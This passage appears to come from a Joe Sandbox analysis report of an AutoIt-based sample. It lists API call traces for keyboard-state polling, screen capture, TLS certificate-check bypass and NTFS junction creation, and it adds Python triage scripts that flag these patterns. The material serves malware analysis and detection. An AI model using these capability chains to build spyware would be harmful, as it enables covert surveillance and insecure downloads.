                                        • Opcode Fuzzy Hash: 0f1a77b887c47c85993c72d233f4d1270afb9ee49268e73d655ba44f663a2fe9
                                        • Instruction Fuzzy Hash: 0C514AB1600608BFEB229F61C948ABA7BFDFF08754F108419F98A96250D779DD449BA0
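Triage note and added example (not part of the Joe Sandbox report, and not code from the analysed sample). The WinINet entry above reads option 0x1F (INTERNET_OPTION_SECURITY_FLAGS in wininet.h), ORs a value back in with InternetSetOptionW and then sends the request; if the report is printing the DWORD behind lpBuffer, which is how the listing reads, the value 0x100 is SECURITY_FLAG_IGNORE_UNKNOWN_CA, meaning the download path will accept a server certificate from an untrusted CA. Two caveats a reviewer should keep in mind: the dump these functions come from is the AutoIt v3 interpreter itself (see the "AutoIt v3 GUI" string in the earlier entry), so this is the runtime's built-in download helper and only tells you what capability the embedded script could use, not that it does; and the same caveat applies to the GDI screenshot chain (GetDC, CreateCompatibleBitmap, StretchBlt, GetDIBits) listed at the end of this section. The script below parses this per-function listing format into records and flags those two patterns so the entries worth reading first surface automatically; the constants are from wininet.h and SAMPLE is a constructed excerpt of the page's own lines.

```python
"""Triage helper for Joe Sandbox per-function API listings.

Added example: not Joe Sandbox code and not from the analysed sample. It
parses the text form of the "APIs ... Instruction Fuzzy Hash" blocks into
records and flags call patterns a reviewer wants to look at first.
"""
import re
from dataclasses import dataclass, field

# wininet.h values used to interpret the listed arguments (assumption: the
# report prints the DWORD behind lpBuffer rather than the pointer itself).
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAG_IGNORE_UNKNOWN_CA = 0x100

# "• Name.MODULE(args), ref: ADDR" with an optional "Part of subcall" prefix
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• Key Name: value" metadata lines (API String ID, Opcode ID, ...)
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list        # 8-digit hex args as int; '?' and string args as None
    ref: int          # call-site address
    subcall: bool     # listed as "Part of subcall function ..."


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def api_names(self):
        return {c.name for c in self.calls}


def _arg(tok):
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def parse_entries(text):
    """Split the listing at each 'APIs' header; collect calls and fields."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [_arg(a) for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["mod"], args,
                                     int(m["ref"], 16), bool(m["sub"])))
            continue
        m = FIELD_LINE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
    return entries


def sets_ignore_unknown_ca(entry):
    """InternetSetOptionW(h, INTERNET_OPTION_SECURITY_FLAGS, &flags, 4) with
    SECURITY_FLAG_IGNORE_UNKNOWN_CA: chain validation disabled for the handle."""
    for c in entry.calls:
        if c.name == "InternetSetOptionW" and len(c.args) >= 3:
            if (c.args[1] == INTERNET_OPTION_SECURITY_FLAGS
                    and c.args[2] is not None
                    and c.args[2] & SECURITY_FLAG_IGNORE_UNKNOWN_CA):
                return True
    return False


def grabs_screen(entry):
    """GetDC + CreateCompatibleBitmap + (Bit|Stretch)Blt + GetDIBits is the
    classic GDI screenshot chain."""
    names = entry.api_names
    return ({"GetDC", "CreateCompatibleBitmap", "GetDIBits"} <= names
            and bool(names & {"BitBlt", "StretchBlt"}))


RULES = {"wininet-ignore-unknown-ca": sets_ignore_unknown_ca,
         "screen-capture": grabs_screen}


def triage(text):
    """Return [(label, [matched rule, ...]), ...], one tuple per entry."""
    out = []
    for e in parse_entries(text):
        label = e.fields.get("API String ID") or (
            f"sub_{e.calls[0].ref:08X}" if e.calls else "?")
        out.append((label, sorted(n for n, rule in RULES.items() if rule(e))))
    return out


# Constructed excerpt of the report's own listing (three function entries).
SAMPLE = """\
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00788D51
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00788E7C
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00788EA8
Similarity
• API String ID: 799131459-1772520864
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0076CE0D
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0076CE4D
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0076CE90
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0076CEA6
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0076CEB1
• InternetCloseHandle.WININET(00000000), ref: 0076CF58
Similarity
• API String ID: 3800310941-3916222277
APIs
• GetDC.USER32(00000000), ref: 00772F35
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00772F45
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00772FCA
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0077302D
  • Part of subcall function 006F19CD: GetCursorPos.USER32(?), ref: 006F19E1
"""

if __name__ == "__main__":
    for label, hits in triage(SAMPLE):
        print(label, hits or "-")
```

Run it against the full "Execution Graph" text of a report to get one line per function; entries with no "API String ID" are labelled by their first call site. The flags are capability markers for the runtime, so the follow-up is to decompile the embedded AutoIt script and check whether it actually calls InetGet/InetRead with the ignore-SSL option or the screen-capture UDFs.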
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00788EF1
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00788F01
                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00788F0C
                                        • CloseHandle.KERNEL32(00000000), ref: 00788F19
                                        • GlobalLock.KERNEL32(00000000), ref: 00788F27
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00788F36
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00788F3F
                                        • CloseHandle.KERNEL32(00000000), ref: 00788F46
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00788F57
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00790C04,?), ref: 00788F70
                                        • GlobalFree.KERNEL32(00000000), ref: 00788F80
                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00788FA0
                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00788FD0
                                        • DeleteObject.GDI32(00000000), ref: 00788FF8
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0078900E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3840717409-0
                                        • Opcode ID: b64cc663278179641f7f1450c5882aee407ea273f9ec96d126aeb1e79f105299
                                        • Instruction ID: 6d5425b14c1078b15863bbe18080fecc512e23f7d8a1ec31c5737dfccfe1bedf
                                        • Opcode Fuzzy Hash: b64cc663278179641f7f1450c5882aee407ea273f9ec96d126aeb1e79f105299
                                        • Instruction Fuzzy Hash: 35412D75640208BFDB21DF65DC48EAA7BB9FF89761F208059F905D7290DB389D01DB24
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00772F35
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00772F45
                                        • CreateCompatibleDC.GDI32(?), ref: 00772F51
                                        • SelectObject.GDI32(00000000,?), ref: 00772F5E
                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00772FCA
                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00773009
                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0077302D
                                        • SelectObject.GDI32(?,?), ref: 00773035
                                        • DeleteObject.GDI32(?), ref: 0077303E
                                        • DeleteDC.GDI32(?), ref: 00773045
                                        • ReleaseDC.USER32(00000000,?), ref: 00773050
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: 7ac832ed0a8ff30f8beda9b6302815e85a3dba3070c70716e88ad046a162413e
                                        • Instruction ID: 4ea994c48bf58a34ec4fbfdec2162b6ca2b98f1caaef58e51a5a3e78a9a4fae3
                                        • Opcode Fuzzy Hash: 7ac832ed0a8ff30f8beda9b6302815e85a3dba3070c70716e88ad046a162413e
                                        • Instruction Fuzzy Hash: D361F3B5D00219EFCF14CFA4D888EAEBBB6FF48310F208419E559A7250E779A941CF94
                                        APIs
                                        • GetMenuItemInfoW.USER32(007C2990,000000FF,00000000,00000030), ref: 0075C888
                                        • SetMenuItemInfoW.USER32(007C2990,00000004,00000000,00000030), ref: 0075C8BD
                                        • Sleep.KERNEL32(000001F4), ref: 0075C8CF
                                        • GetMenuItemCount.USER32(?), ref: 0075C915
                                        • GetMenuItemID.USER32(?,00000000), ref: 0075C932
                                        • GetMenuItemID.USER32(?,-00000001), ref: 0075C95E
                                        • GetMenuItemID.USER32(?,?), ref: 0075C9A5
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0075C9EB
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075CA00
                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075CA21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountRadioSleep
                                        • String ID: 0
                                        • API String ID: 1460738036-4108050209
                                        • Opcode ID: 4434666fc4e598a8d9abb99830f8878796df36e3f2b8d9f17fedb9c68aa9d3e5
                                        • Instruction ID: 788ca28d45f4245b41bb0662da2ec157393132d528b06ef1c1cfd48398d95c53
                                        • Opcode Fuzzy Hash: 4434666fc4e598a8d9abb99830f8878796df36e3f2b8d9f17fedb9c68aa9d3e5
                                        • Instruction Fuzzy Hash: 69616C70900349AFDB22CF64C898BEE7FB8FB05315F144019ED51A3291DBB9AD59CB60
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0076469A
                                        • _wcslen.LIBCMT ref: 007646C7
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 007646F7
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00764718
                                        • RemoveDirectoryW.KERNEL32(?), ref: 00764728
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007647AF
                                        • CloseHandle.KERNEL32(00000000), ref: 007647BA
                                        • CloseHandle.KERNEL32(00000000), ref: 007647C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                        • String ID: :$\$\??\%s
                                        • API String ID: 1149970189-3457252023
                                        • Opcode ID: 4ea565e6de3f5000f8d8fc5899a6e17789f356f3cfb5acb6f1c0795b46aa47e2
                                        • Instruction ID: e51fdc2ecf4f79fef53db479b548702ffd2805437a90d90a0ff25ca26668f5ac
                                        • Opcode Fuzzy Hash: 4ea565e6de3f5000f8d8fc5899a6e17789f356f3cfb5acb6f1c0795b46aa47e2
                                        • Instruction Fuzzy Hash: EB31C8B1940209ABDB319FA4DC48FEB37BDEF89740F1041B5F905D60A0E7789B848B24
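                                         The function block above is given only as raw constants. The decoder below is an added example written for this page, not code from the sample and not part of Joe Sandbox: it splits the DeviceIoControl control code into its CTL_CODE fields (0x000900A4 decodes to FSCTL_SET_REPARSE_POINT), names the CreateFileW arguments (GENERIC_WRITE, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT) and, over trace lines parsed in the plugin's own format, flags the open-with-OPEN_REPARSE_POINT-then-FSCTL_SET_REPARSE_POINT sequence. Read together with the "\??\%s" string in the block, that sequence is consistent with creating an NTFS junction (mount-point reparse data carries an NT-style path); treating that as the function's purpose is an inference of mine, not something the report states. The FSCTL table is deliberately limited to the three reparse-point codes, and the sample trace is the block's own eight lines.

```python
import re

# Added example for this report page (not sample code, not Joe Sandbox code): decode the raw
# CreateFileW / DeviceIoControl constants from an API trace and flag the
# "open with FILE_FLAG_OPEN_REPARSE_POINT, then FSCTL_SET_REPARSE_POINT" sequence.

# CTL_CODE layout: DeviceType[31:16] | Access[15:14] | Function[13:2] | Method[1:0]
FILE_DEVICE_FILE_SYSTEM = 0x09
IOCTL_METHOD = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
IOCTL_ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
                3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
KNOWN_FSCTL = {  # only the file-system control codes that deal with reparse points
    0x000900A4: "FSCTL_SET_REPARSE_POINT",
    0x000900A8: "FSCTL_GET_REPARSE_POINT",
    0x000900AC: "FSCTL_DELETE_REPARSE_POINT",
}

GENERIC_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                  (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
CREATEFILE_FLAGS = [
    (0x80000000, "FILE_FLAG_WRITE_THROUGH"), (0x40000000, "FILE_FLAG_OVERLAPPED"),
    (0x20000000, "FILE_FLAG_NO_BUFFERING"), (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"),
    (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"), (0x00200000, "FILE_FLAG_OPEN_REPARSE_POINT"),
    (0x00000080, "FILE_ATTRIBUTE_NORMAL"),
]


def decode_ioctl(code):
    """Split a DeviceIoControl control code into its CTL_CODE fields and name known FSCTLs."""
    device = (code >> 16) & 0xFFFF
    return {
        "device_type": device,
        "access": IOCTL_ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": IOCTL_METHOD[code & 0x3],
        "name": KNOWN_FSCTL.get(code) if device == FILE_DEVICE_FILE_SYSTEM else None,
    }


def decode_createfile(access, disposition, flags):
    """Name the dwDesiredAccess, dwCreationDisposition and dwFlagsAndAttributes bits."""
    names, rest = [], flags
    for bit, name in CREATEFILE_FLAGS:
        if flags & bit:
            names.append(name)
            rest &= ~bit
    return {
        "access": [name for bit, name in GENERIC_ACCESS if access & bit],
        "disposition": DISPOSITION.get(disposition, "0x%X" % disposition),
        "flags": names,
        "unknown_flags": rest,  # bits not in the table above, left for the reader to look up
    }


# One trace line as the Joe Sandbox IDA plugin prints it: "• Api.MODULE(arg,arg,...), ref: ADDR"
TRACE_LINE = re.compile(r"•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_trace(text):
    """Return (api, module, args, ref) tuples; 8-digit hex args become ints, '?' stays a string."""
    calls = []
    for m in TRACE_LINE.finditer(text):
        args = []
        for raw in m.group("args").split(","):
            raw = raw.strip()
            if re.fullmatch(r"-?[0-9A-Fa-f]{8}", raw):
                args.append(-int(raw[1:], 16) if raw.startswith("-") else int(raw, 16))
            else:
                args.append(raw)  # unresolved ('?') or a string literal
        calls.append((m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def find_reparse_point_set(calls):
    """Return (createfile_ref, ioctl_ref) when CreateFileW opens a path with
    FILE_FLAG_OPEN_REPARSE_POINT and a later DeviceIoControl issues FSCTL_SET_REPARSE_POINT."""
    open_ref = None
    for api, _module, args, ref in calls:
        if api == "CreateFileW" and len(args) >= 6 and all(isinstance(args[i], int) for i in (1, 4, 5)):
            if "FILE_FLAG_OPEN_REPARSE_POINT" in decode_createfile(args[1], args[4], args[5])["flags"]:
                open_ref = ref
        elif api == "DeviceIoControl" and open_ref is not None and isinstance(args[1], int):
            if decode_ioctl(args[1])["name"] == "FSCTL_SET_REPARSE_POINT":
                return open_ref, ref
    return None


# The eight trace lines of the function block above, copied from this report.
SAMPLE_TRACE = """
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0076469A
• _wcslen.LIBCMT ref: 007646C7
• CreateDirectoryW.KERNEL32(?,00000000), ref: 007646F7
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00764718
• RemoveDirectoryW.KERNEL32(?), ref: 00764728
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007647AF
• CloseHandle.KERNEL32(00000000), ref: 007647BA
• CloseHandle.KERNEL32(00000000), ref: 007647C5
"""

if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    for api, _m, args, ref in calls:
        if api == "CreateFileW":
            print("%08X CreateFileW" % ref, decode_createfile(args[1], args[4], args[5]))
        elif api == "DeviceIoControl":
            print("%08X DeviceIoControl" % ref, decode_ioctl(args[1]))
    print("reparse-point set sequence:", find_reparse_point_set(calls))
```

The sequence check keys on the CreateFileW flags rather than on the IOCTL alone because FILE_FLAG_OPEN_REPARSE_POINT is what lets the handle address the reparse point itself instead of following it; a DeviceIoControl with FSCTL_SET_REPARSE_POINT on a handle opened without it would fail against an existing link. The `_wcslen.LIBCMT` line has no argument list and is skipped by the parser on purpose.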
                                        APIs
                                        • timeGetTime.WINMM ref: 0075EEE0
                                          • Part of subcall function 0070F27E: timeGetTime.WINMM(?,?,0075EF00), ref: 0070F282
                                        • Sleep.KERNEL32(0000000A), ref: 0075EF0D
                                        • EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 0075EF31
                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0075EF53
                                        • SetActiveWindow.USER32 ref: 0075EF72
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0075EF80
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0075EF9F
                                        • Sleep.KERNEL32(000000FA), ref: 0075EFAA
                                        • IsWindow.USER32 ref: 0075EFB6
                                        • EndDialog.USER32(00000000), ref: 0075EFC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        • Opcode ID: 81e01548fdcd6d12229cae35812b5ee5ab3e17aa5e1eed42bb0b75a12b2383e5
                                        • Instruction ID: 528b5de54fe8007b1c352d6bd2cadbe93c4e32c1366ed1b42c4ee3cc7286f01a
                                        • Opcode Fuzzy Hash: 81e01548fdcd6d12229cae35812b5ee5ab3e17aa5e1eed42bb0b75a12b2383e5
                                        • Instruction Fuzzy Hash: 5621A770244204BFEB146F60EC8DEAA3B6AF744356F20C419F855912E1DFBD8E44972C
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 0075A8EE
                                        • SetKeyboardState.USER32(?), ref: 0075A959
                                        • GetAsyncKeyState.USER32(000000A0), ref: 0075A979
                                        • GetKeyState.USER32(000000A0), ref: 0075A990
                                        • GetAsyncKeyState.USER32(000000A1), ref: 0075A9BF
                                        • GetKeyState.USER32(000000A1), ref: 0075A9D0
                                        • GetAsyncKeyState.USER32(00000011), ref: 0075A9FC
                                        • GetKeyState.USER32(00000011), ref: 0075AA0A
                                        • GetAsyncKeyState.USER32(00000012), ref: 0075AA33
                                        • GetKeyState.USER32(00000012), ref: 0075AA41
                                        • GetAsyncKeyState.USER32(0000005B), ref: 0075AA6A
                                        • GetKeyState.USER32(0000005B), ref: 0075AA78
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 3e2029c50846280689ee253d2c21f81182402aa514677300eefef0f0fa26b206
                                        • Instruction ID: fda3c06f4067317c9c4508227c272d996f1b9631237641e5e7ca1b98146537dc
                                        • Opcode Fuzzy Hash: 3e2029c50846280689ee253d2c21f81182402aa514677300eefef0f0fa26b206
                                        • Instruction Fuzzy Hash: 6151B63090479879FB35E7A049147EAAFB49F11341F0886AACDC25B1C2DBDCAA4CC762
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 00756571
                                        • GetWindowRect.USER32(00000000,?), ref: 0075658A
                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 007565E8
                                        • GetDlgItem.USER32(?,00000002), ref: 007565F8
                                        • GetWindowRect.USER32(00000000,?), ref: 0075660A
                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 0075665E
                                        • GetDlgItem.USER32(?,000003E9), ref: 0075666C
                                        • GetWindowRect.USER32(00000000,?), ref: 0075667E
                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 007566C0
                                        • GetDlgItem.USER32(?,000003EA), ref: 007566D3
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007566E9
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 007566F6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 03c770e3dc38652da57564f5723d56c0a48b0f0b99031a12b7c68e8531b03c98
                                        • Instruction ID: 88b5f5e85ad8c670c77aeb803ec6446743ef3bd08eeb77382f9c2302b25fa60b
                                        • Opcode Fuzzy Hash: 03c770e3dc38652da57564f5723d56c0a48b0f0b99031a12b7c68e8531b03c98
                                        • Instruction Fuzzy Hash: E05120B0B40209AFDF18CF68DD85AAEBBB5FB48311F608129F919E72D0E7749D048B50
                                        APIs
                                          • Part of subcall function 006F21E4: GetWindowLongW.USER32(?,000000EB), ref: 006F21F2
                                        • GetSysColor.USER32(0000000F), ref: 006F2102
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: eb2bdb76cfeb48de6374fdc66a6d28a01b61de6765680f8cf06dac75c3a8b94c
                                        • Instruction ID: 002c2c4327456cbf47bf1353000e4088fb960a3671c08efca2e7a42a8502579e
                                        • Opcode Fuzzy Hash: eb2bdb76cfeb48de6374fdc66a6d28a01b61de6765680f8cf06dac75c3a8b94c
                                        • Instruction Fuzzy Hash: B141C8315406499FEB309F389C98BBA3B67AB42730F254605FBA2872E1C7359D52DF14
                                        APIs
                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0078499A
                                        • CreateCompatibleDC.GDI32(00000000), ref: 007849A1
                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007849B4
                                        • SelectObject.GDI32(00000000,00000000), ref: 007849BC
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 007849C7
